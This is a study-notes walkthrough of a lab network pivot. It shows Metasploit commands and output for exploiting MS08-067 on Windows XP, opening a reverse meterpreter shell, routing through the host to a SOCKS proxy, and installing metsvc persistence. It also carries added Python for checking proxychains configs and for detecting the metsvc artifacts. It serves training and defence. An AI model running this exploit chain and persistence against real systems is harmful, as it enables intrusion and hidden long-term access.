Preface
Compromise the target host, set it up as a jump host running a proxy server, and reach other hosts through that proxy without leaving traces behind.
I. Scenario
Host a wants to reach host c but cannot: c only accepts connections from specific IP addresses, for example b's. In that case, first compromise b, set up a pivot on it with a proxy server, and access c through that proxy.
In this example, host a runs Kali, host b runs Windows XP, and host c runs Linux.
II. Procedure
1. Compromising host b
Because the target is Windows XP, first test with the most common vulnerability, MS08-067.
Start the database:
┌──(root💀kali)-[~]
└─# service postgresql start
Enter msf, search for ms08_067, select the module and configure its parameters:
msf6 > search ms08_067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.1.115
rhosts => 192.168.1.115
Launch the attack:
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] 192.168.1.115:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.115:1384) at 2021-05-09 09:20:58 +0800
meterpreter >
A meterpreter session was obtained. Use autoroute to add a route entry; the address added is host c's address:
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] No routes have been added yet
meterpreter > run autoroute -s 192.168.1.106
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.1.106/255.255.255.0...
[+] Added route to 192.168.1.106/255.255.255.0 via 192.168.1.115
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.1.106 255.255.255.0 Session 1
meterpreter >
Run background to return to the msf console.
At this point we have a meterpreter session on host b: it was compromised and the route entry was added.
2. Setting up the SOCKS proxy server
Use the socks module, configure its parameters, and run it:
msf6 exploit(windows/smb/ms08_067_netapi) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on
USERNAME no Proxy username for SOCKS5 listener
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > set srvhost 127.0.0.1
srvhost => 127.0.0.1
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server
The proxy server port is now open. Next, the proxychains configuration file (/etc/proxychains4.conf on this Kali) must be edited:
┌──(root💀kali)-[/]
└─# cat etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 1080 # modified line
The socks4 line in the file must be changed to the above; it can be edited with vim, whose basic usage was covered in the previous post.
At this point the command-line configuration is complete.
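A small validator for the [ProxyList] format just edited, written as an added example (not the post's code and not part of the proxychains project). It parses the section, checks each entry's type, IP and port, and confirms that an entry matches the socks_proxy listener settings used above (SRVHOST 127.0.0.1, SRVPORT 1080, VERSION 4a, which requires the socks4 entry type). The sample configuration is constructed; treating text after # on a proxy line as a comment and requiring numeric IP hosts are this validator's own assumptions, not statements about how proxychains itself parses the file.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional

# Constructed sample in the shape of /etc/proxychains4.conf after the edit above
# (one trailing "# ..." comment kept on the socks4 line, as in the session).
SAMPLE_CONF = """\
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 1080 # modified line
socks5 10.0.0.5 1081 user pass
http 192.168.1.254 3128
"""

# Entry types accepted here; the msf socks_proxy VERSION setting maps onto two of them.
VALID_TYPES = {"http", "socks4", "socks5"}
MSF_VERSION_TO_TYPE = {"4a": "socks4", "5": "socks5"}


@dataclass
class ProxyEntry:
    ptype: str
    host: str
    port: int
    user: Optional[str] = None
    password: Optional[str] = None


def parse_proxylist(text: str):
    """Return (entries, problems) for the [ProxyList] section of a proxychains config.

    Assumptions of this validator (not claims about proxychains itself): text after
    '#' on a proxy line is a comment, and hosts must be numeric IP addresses.
    """
    entries, problems = [], []
    in_list = False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        if line.startswith("["):                 # section header
            in_list = line.lower() == "[proxylist]"
            continue
        if not in_list:
            continue
        fields = line.split()
        if len(fields) not in (3, 5):            # "type host port [user pass]"
            problems.append(f"line {lineno}: expected 'type host port [user pass]', got {raw.strip()!r}")
            continue
        ptype, host, port = fields[0].lower(), fields[1], fields[2]
        if ptype not in VALID_TYPES:
            problems.append(f"line {lineno}: unknown proxy type {ptype!r}")
            continue
        try:
            ipaddress.ip_address(host)
        except ValueError:
            problems.append(f"line {lineno}: host {host!r} is not an IP address")
            continue
        if not port.isdigit() or not 1 <= int(port) <= 65535:
            problems.append(f"line {lineno}: bad port {port!r}")
            continue
        user, pw = (fields[3], fields[4]) if len(fields) == 5 else (None, None)
        entries.append(ProxyEntry(ptype, host, int(port), user, pw))
    if not entries:
        problems.append("no usable entries in [ProxyList]")
    return entries, problems


def matches_listener(entries, srvhost: str, srvport: int, version: str) -> bool:
    """True if some entry points at the msf socks_proxy listener with the matching protocol.

    A socks5 entry against a VERSION=4a listener (or the reverse) is a common reason
    proxychains reports connection failures even though the msf job is running.
    """
    want = MSF_VERSION_TO_TYPE[version]
    return any(e.ptype == want and e.host == srvhost and e.port == srvport for e in entries)


if __name__ == "__main__":
    entries, problems = parse_proxylist(SAMPLE_CONF)
    for e in entries:
        print(e)
    for p in problems:
        print("problem:", p)
    print("matches msf listener (4a at 127.0.0.1:1080):",
          matches_listener(entries, "127.0.0.1", 1080, "4a"))
```

Run it against the real file with `parse_proxylist(open("/etc/proxychains4.conf").read())`; the `matches_listener` check is the quick way to confirm the proxychains entry and the msf `VERSION`/`SRVHOST`/`SRVPORT` settings agree before blaming the route.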
3. Setting the browser proxy
I use the Firefox ESR that ships with Kali; configure the proxy there.
After configuring the proxy, access the target.
The reason I could not access it here is probably that the target's www folder contains no files, so there is nothing to access.
4. Setting up persistent access
Access to host b is easily lost, so persisting the access is necessary; here this is done by installing metsvc:
meterpreter > run metsvc -A
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\MWPrEozxdnwJwU...
[*] >> Uploading metsrv.x86.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
[*] Trying to connect to the Meterpreter service at 192.168.1.115:31337...
meterpreter > [*] 192.168.1.115 - Meterpreter session 2 closed. Reason: Died
meterpreter > [*] Meterpreter session 2 opened (192.168.1.115:1385 -> 192.168.1.115:31337) at 2021-05-09 09:36:10 +0800
As shown, metsvc creates a service on port 31337 and uploads a malicious program. From now on, whenever that service needs to be reached, use the handler with the payload set to metsvc_bind_tcp to regain access:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload payload/windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/metsvc_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set lport 31337
lport => 31337
msf6 exploit(multi/handler) > set rhost 192.168.1.115
rhost => 192.168.1.115
msf6 exploit(multi/handler) > exploit
[*] Started bind TCP handler against 192.168.1.115:31337
[*] Meterpreter session 7 opened (192.168.1.115:1387 -> 192.168.1.115:31337) at 2021-05-09 09:45:09 +0800
meterpreter >
Successfully reconnected.
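From the defender's side, the session above leaves two kinds of traces on host b: a new service (name metsvc, binary under C:\WINDOWS\TEMP\..., recorded as event 7045 in the Windows System log) and a new listener on port 31337 alongside the outbound connection to the handler on port 4444. The detection logic below is added here as an example (not the post's code and not part of Metasploit); it runs over constructed event-log and netstat samples that copy those details. The names and ports it matches are the defaults seen in this session and are easy for an operator to change, so the comparison against a baseline of expected listeners matters more than the fixed values.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Constructed records modelled on Windows System log event 7045 ("A service was
# installed in the system") exported as pipe-separated text. The service name and
# temp-directory path mirror what the metsvc session prints; the rest is made up.
SAMPLE_EVENTS = [
    "7045|2021-05-09 09:36:05|Service Name: metsvc|Service File Name: C:\\WINDOWS\\TEMP\\MWPrEozxdnwJwU\\metsvc.exe|Service Start Type: auto start|Service Account: LocalSystem",
    "7045|2021-05-09 08:10:00|Service Name: VMTools|Service File Name: C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe|Service Start Type: auto start|Service Account: LocalSystem",
    "7036|2021-05-09 09:36:06|The metsvc service entered the running state.",
]

# Constructed output in the shape of "netstat -ano" on the pivot host (135/445 are the
# host's normal listeners; 31337 and the connection to 4444 come from the session).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       908
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       1640
  TCP    192.168.1.115:1384     192.168.1.113:4444     ESTABLISHED     1012
"""

TEMP_DIRS = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)
KNOWN_BAD_NAMES = {"metsvc"}                                              # service name from the session
KNOWN_BAD_FILES = {"metsvc.exe", "metsvc-server.exe", "metsrv.x86.dll"}  # files it uploads
DEFAULT_MSF_PORTS = {31337, 4444}   # metsvc default and msf default LPORT; trivially changed


@dataclass
class Finding:
    source: str
    reason: str
    detail: str


def parse_7045(line: str):
    """Turn one exported 7045 record into a dict of its 'Key: value' fields, else None."""
    fields = line.split("|")
    if fields[0] != "7045":
        return None
    kv = {}
    for field in fields[2:]:
        key, _, value = field.partition(": ")
        kv[key.strip()] = value.strip()
    return kv


def check_service_events(lines: Iterable[str]) -> List[Finding]:
    """Flag new services that are known meterpreter artifacts or run from temp directories."""
    findings = []
    for line in lines:
        ev = parse_7045(line)
        if not ev:
            continue
        name = ev.get("Service Name", "")
        path = ev.get("Service File Name", "")
        exe = path.rsplit("\\", 1)[-1].lower()
        if name.lower() in KNOWN_BAD_NAMES or exe in KNOWN_BAD_FILES:
            findings.append(Finding("eventlog", "known meterpreter service artifact", f"{name} -> {path}"))
        elif TEMP_DIRS.search(path):
            findings.append(Finding("eventlog", "service binary installed from a temp directory", f"{name} -> {path}"))
    return findings


def check_netstat(text: str, baseline_listen_ports: set) -> List[Finding]:
    """Flag listeners outside the baseline and connections to default handler ports."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP":   # skips the header and UDP rows
            continue
        _, local, foreign, state, pid = parts
        lport = int(local.rsplit(":", 1)[1])
        fport = int(foreign.rsplit(":", 1)[1])
        if state == "LISTENING" and lport not in baseline_listen_ports:
            reason = ("listener on a default metsvc/msf port" if lport in DEFAULT_MSF_PORTS
                      else "listener not in baseline")
            findings.append(Finding("netstat", reason, f"{local} pid {pid}"))
        elif state == "ESTABLISHED" and fport in DEFAULT_MSF_PORTS:
            findings.append(Finding("netstat", "connection to a default msf handler port",
                                    f"{local} -> {foreign} pid {pid}"))
    return findings


if __name__ == "__main__":
    for f in check_service_events(SAMPLE_EVENTS) + check_netstat(SAMPLE_NETSTAT, {135, 445}):
        print(f"[{f.source}] {f.reason}: {f.detail}")
```

The temp-directory rule catches the service regardless of what it is called, which is why it is kept separate from the name and port matches; on a real host, feed `check_netstat` the per-host baseline of expected listening ports rather than the two-port set used here.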
Summary
This post briefly covered meterpreter pivoting scripts and establishing persistent access. I am still learning myself; this is for reference only, kept as study notes, and discussion is welcome.